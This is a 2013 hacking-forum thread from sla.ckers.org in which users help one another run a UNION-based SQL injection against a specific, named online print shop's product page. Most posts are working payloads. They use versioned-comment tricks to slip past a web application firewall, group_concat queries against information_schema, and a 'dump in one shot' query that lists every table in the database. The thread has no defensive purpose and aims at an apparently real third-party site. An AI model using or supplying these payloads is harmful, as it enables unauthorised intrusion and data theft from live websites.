Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
FUNCTION dkprintw_db.0group_concat does not exist
Posted by: kenjii
Date: November 29, 2013 01:37PM

hi all i have some problem with this one

http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,/*!500000group_concat*/(table_name),49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables

i can get the first table_name but when i try to concat i got this error

FUNCTION dkprintw_db.0group_concat does not exist

it there a way for get other table or another syntax to use?

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: November 29, 2013 02:51PM

WAF is protecting group_concat function.

use

hXXp://wXw.dkpr[slackers]intworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,/*!50000Group_Concat(table_name,0x3c62723e)*/,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56 from /*!50000information_schema*/.tables where table_schema=database()-- -

but you will hit group_concat 1024 characters limit (you won't see all tables in database) so you will have to use "dump in one shot" syntax (see bellow) to overcome that...

here is numbered list of all tables in database:
hXXp://wXw.dkprint[slackers]world.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
(/*!50000SeLeCt*/(@x) from (/*!50000SeLeCt*/(@x:=0x00), (@running_number:=0),(/*!50000SeLeCt*/(0) from ( /*!50000information_schema*/.tables ) where (table_schema=database()) and (0x00) in (@x:=concat (@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20,table_name))))x)
,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56-- -

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: hack2012
Date: December 02, 2013 08:16PM

http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database()

Just use "concat" function , then you will find the red color is the table name you want



Edited 1 time(s). Last edit at 12/02/2013 08:19PM by hack2012.

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: December 03, 2013 06:10PM

@hack2012

your tip is wrong.

Function concat() is for concatenating few arguments. Like concat(version(), 'ajkaro')

As you are not concatenating anything to table_name (your code: concat(table_name)) function concat() isn't doing anything in you case, so you can delete it.

You need group_concat function if you want to see all tables at once and not only ONE table as in your case.

But as there are too many tables to fit in group_concat 1024 characters limit you will have to use "dump in one shot" syntax instead of group_concat if you want to see ALL tables at once on the screen.

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: firestorm
Date: December 09, 2013 11:55PM

Aj! My dear your wrong !! :P

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: December 11, 2013 01:14PM

Dear firestorm

do you mind to elaborate :)

Options: ReplyQuote
Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: firestorm
Date: December 11, 2013 05:29PM

Got ya!
hehehe... just kidding :P

Options: ReplyQuote


Sorry, only registered users may post in this forum.